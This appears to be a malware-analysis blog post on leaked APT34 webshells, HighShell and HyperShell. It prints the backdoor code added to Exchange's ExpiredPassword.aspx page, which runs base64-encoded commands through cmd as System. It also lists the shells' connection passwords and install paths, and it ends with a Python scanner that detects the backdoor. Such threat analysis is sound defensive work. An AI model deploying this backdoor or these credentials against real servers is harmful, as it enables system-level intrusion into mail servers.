0x00 Preface

---

Recently, six tools from APT34 were leaked. As the second article in the analysis series, this post focuses solely on the technical analysis of HighShell and HyperShell.

References:

https://malware-research.org/apt34-hacking-tools-leak/amp/

0x01 Introduction

---

This article will cover the following:

  • Analysis of HighShell
  • Analysis of HyperShell
  • Summary

0x02 Analysis of HighShell

---

The corresponding leaked file is named HighShell in the Webshells_and_Panel folder.

The file in question is HighShell.aspx, a webshell targeting Windows servers.

The default access page is shown in the figure below.

[Figure: default HighShell.aspx page]

The login box is red and requires a connection password.

The correct password is Th!sN0tF0rFAN.

After entering the correct password, click 'Do it' and refresh the page to successfully log in, as shown in the figure below.

[Figure: HighShell.aspx after successful login]

The login box turns green.

Public information about this tool:

https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/

HighShell presents the same page as the TwoFace webshell described in that Palo Alto Networks article.

0x03 Analysis of HyperShell

---

The corresponding leaked file is named HyperShell in the Webshells_and_Panel folder.

It contains the following 7 subfolders:

  1. ExpiredPasswordTech
  2. HyperShell
  3. Image
  4. Libraries
  5. packages
  6. ShellLocal
  7. StableVersion

1. ExpiredPasswordTech

Includes 3 files:

  • error4.aspx: same functionality as HighShell.aspx, but the login credentials are unknown
  • ExpiredPassword.aspx: webshell for Exchange
  • MyMaster.aspx: generates the string NxKK7a

2. HyperShell

Contains the source code of several webshells.

It includes another usable webshell, at relative path: .\Webshells_and_Panel\HyperShell\HyperShell\Shell\simple.aspx

Connection password: MkRg5dm8MOk

As shown in the figure below.

[Figure: simple.aspx after login]

3. Image

Contains images.

4. Libraries

Contains multiple dependency files.

5. packages

Contains multiple dependency files.

6. ShellLocal

Empty folder

7. StableVersion

The stable versions; contains multiple webshells.

(1) ExpiredPassword.aspx

Webshell for Exchange.

Relative path: .\Webshells_and_Panel\HyperShell\StableVersion\HighShell v5.0\HyperShell\HyperShell\ExpiredPasswordTech

Same content as the file under relative path .\Webshells_and_Panel\HyperShell\ExpiredPasswordTech

ExpiredPassword.aspx is a legitimate Exchange page: the one used to reset an expired user password, as shown in the figure below.

[Figure: the Exchange ExpiredPassword.aspx password-reset page]

Accessed URL: https:///owa/auth/ExpiredPassword.aspx

Corresponding Windows absolute path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\ExpiredPassword.aspx

A webshell placed at this path runs as System by default.

My test system has Exchange 2013 installed. I have uploaded the normal ExpiredPassword.aspx source code to GitHub:

https://raw.githubusercontent.某开源项目.aspx(2013)

The ExpiredPassword.aspx in HyperShell is this same page with backdoor code added. Compared with the normal ExpiredPassword.aspx from my test environment, it shows multiple differences, as shown in the figure below.

[Figure: diff between HyperShell's ExpiredPassword.aspx and the original]

Analysis suggests most of these differences come from the Exchange versions involved. Setting version differences aside, the main code added to HyperShell's ExpiredPassword.aspx is as follows:

```aspx
<%
try
{
    // Authentication: the newPwd1 form field carries a base64-encoded password,
    // which is appended with a hard-coded salt, hashed with SHA-1 and compared
    // against a hard-coded base64 digest.
    if (Convert.ToBase64String(new System.Security.Cryptography.SHA1Managed().ComputeHash(Encoding.ASCII.GetBytes(Encoding.ASCII.GetString(Convert.FromBase64String(Request.Form["newPwd1"])) + "reDGEa@#!%FS"))) == "+S6Kos9D/etq1cd///fgTarVnUQ=")
    {
        // Command execution: the "Confirm new password" field (newPwd2) carries a
        // base64-encoded command, which is run through cmd /c with its output captured.
        System.Diagnostics.Process p = new System.Diagnostics.Process();
        System.Diagnostics.ProcessStartInfo i = p.StartInfo;
        i.FileName = "cmd";
        i.Arguments = "/c " + Encoding.UTF8.GetString(Convert.FromBase64String(Request.Form["newPwd2"]));
        i.UseShellExecute = false;
        i.CreateNoWindow = true;
        i.RedirectStandardOutput = true;
        p.Start();
        string r = p.StandardOutput.ReadToEnd();
        p.WaitForExit();
        p.Close();
        // The output is HTML-encoded and returned in a <pre> block; the response
        // is then ended so the normal password-reset page is never rendered.
        Response.Write("<pre>" + Server.HtmlEncode(r) + "</pre>");
        Response.End();
    }
}
catch { }
%>
```

Corresponding to my test environment, which is Exchange 2013, the code with payload added and verification steps removed has been uploaded to GitHub:

https://raw.githubusercontent.某开源项目.aspx(2013)(HyperShell)

The 'Confirm new password' field (newPwd2) carries the base64-encoded command, which is executed with System privileges.
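As an added detection example (this is not code from the leaked files or from the original article), the following Python scans an OWA auth directory for the markers of this backdoor: the hard-coded salt and digest quoted above, plus the generic pattern of a password-reset form field being handed to cmd.exe. The sample page contents and the temporary owa/auth tree are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Indicators copied from the backdoored ExpiredPassword.aspx quoted above.
KNOWN_SALT = "reDGEa@#!%FS"
KNOWN_HASH = "+S6Kos9D/etq1cd///fgTarVnUQ="
# Generic pattern: a password-reset form field handed straight to cmd.exe.
GENERIC_MARKERS = [re.compile(p) for p in (
    r"System\.Diagnostics\.Process", r'FileName\s*=\s*"cmd"', r'Request\.Form\["newPwd\d"\]')]

def scan_aspx_text(text: str) -> List[str]:
    """Return the indicators found in one page's source (empty when clean)."""
    hits = []
    if KNOWN_SALT in text:
        hits.append("known-salt")
    if KNOWN_HASH in text:
        hits.append("known-hash")
    if all(m.search(text) for m in GENERIC_MARKERS):
        hits.append("form-field-to-cmd")
    return hits

def scan_tree(root: Path) -> Dict[str, List[str]]:
    """Scan every .aspx under root and map relative path -> indicators found."""
    findings = {}
    for page in sorted(root.rglob("*.aspx")):
        hits = scan_aspx_text(page.read_text(errors="replace"))
        if hits:
            findings[page.relative_to(root).as_posix()] = hits
    return findings

# Constructed samples (not real Exchange source): a harmless fragment that
# reads the same form field, and the backdoor logic quoted in this article.
CLEAN_PAGE = '<% string pwd = Request.Form["newPwd1"]; %>'
BACKDOORED_PAGE = '''<% if (Convert.ToBase64String(sha1.ComputeHash(Encoding.ASCII.GetBytes(
    pwd + "reDGEa@#!%FS"))) == "+S6Kos9D/etq1cd///fgTarVnUQ=") {
  System.Diagnostics.Process p = new System.Diagnostics.Process();
  p.StartInfo.FileName = "cmd";
  p.StartInfo.Arguments = "/c " + Encoding.UTF8.GetString(Convert.FromBase64String(Request.Form["newPwd2"])); } %>'''

def demo() -> Dict[str, List[str]]:
    """Write both samples into a throwaway owa/auth tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        auth = Path(tmp) / "owa" / "auth"
        auth.mkdir(parents=True)
        (auth / "clean.aspx").write_text(CLEAN_PAGE)
        (auth / "ExpiredPassword.aspx").write_text(BACKDOORED_PAGE)
        return scan_tree(Path(tmp))
```

On a real server, point scan_tree at the FrontEnd\HttpProxy\owa\auth directory and compare any flagged file against a known-good copy from the same Exchange build, since the legitimate page legitimately reads newPwd1 and newPwd2.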

(2) HighShellLocal

A feature-rich webshell.

Relative path: .\Webshells_and_Panel\Webshells_and_Panel\HyperShell\StableVersion\HighShell v5.0\HyperShell\HyperShell\ShellLocal\StableVersions\ShellLocal-v8.8.5.rar

After extracting into the current directory, the webshell sits at relative path .\ShellLocal-v8.8.5\ShellLocal-v8.8.5\HighShellLocal and includes the following files:

  • Folder css
  • Folder files
  • Folder js
  • HighShellLocal.aspx

For actual use, the bin folder under .\ShellLocal-v8.8.5\ShellLocal-v8.8.5\ is also required; otherwise the page fails with a JSON usage error.

The complete structure is as follows:

```text
│   HighShellLocal.aspx
│
├───bin
│       Newtonsoft.Json.dll
│
├───css
│   │   main.css
│   │
│   └───img
│           box-zipper.png
│           download-cloud.png
│           exclamation-diamond.png
│           heart-break.png
│           heart-empty.png
│           heart.png
│           minus-button.png
│
├───files
│       7za.exe
│       nbt.exe
│       rx.exe
│
└───js
    │   explorer.js
    │   main.js
    │   send.js
    │   utility.js
    │
    ├───components
    ├───jquery
    └───semantic
```

Login password: Th!sN0tF0rFAN

The login page is shown in the following figure.

[Figure: HighShellLocal login page]

After entering the correct login password, the page looks as shown below.

[Figure: HighShellLocal after login]

As can be seen, this webshell supports many functions.

0x04 Summary

---

This article analyzes HighShell and HyperShell from the leaked files. The ExpiredPassword.aspx in HyperShell is a relatively concealed webshell. So far, I have not found this exploitation method in publicly available materials.